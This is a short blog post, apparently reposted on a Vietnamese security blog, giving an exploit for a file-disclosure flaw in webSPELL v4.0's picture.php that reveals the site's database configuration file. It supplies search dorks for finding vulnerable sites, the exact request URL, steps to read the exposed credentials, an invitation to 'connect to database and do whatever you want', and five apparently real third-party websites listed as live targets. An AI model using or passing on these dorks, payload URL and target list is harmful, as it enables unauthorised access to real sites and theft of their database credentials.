J2TEAM Security: A must-have extension for Chrome users. Install now!
Trang chủ
Exploit
Remote Code Execution

WebShell remote Configuration excution

WebShell remote Configuration excution | Juno_okyo's Blog
webShell 4.O remote Configuration excution
vulnerable url : http://website.com/picture.php?file=_mysql.php
             WebShell remote Configuration excution | Juno_okyo's Blog
Dorks : ext:php intitle:webSPELL v4.0
            "inurl:/picture.php?file="
Find  vulnerable website and goto  http://website.com/picture.php?file=_mysql.php
you'll get a Blanck Page 
press ctrl+U and view source 
you'll find something like this 
Now connect to database and do whatever you want
Live demo : 
http://www.echoes-guild.com/picture.php?file=_mysql.php
http://www.crazyfungamer.de/picture.php?file=_mysql.php 
http://www.dj-pedrofernandez.de/cgi//picture.php?file=_mysql.php
http://r0fld2.uw.hu/picture.php?file=_mysql.php
http://www.street.clanfusion.de/picture.php?file=_mysql.php
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!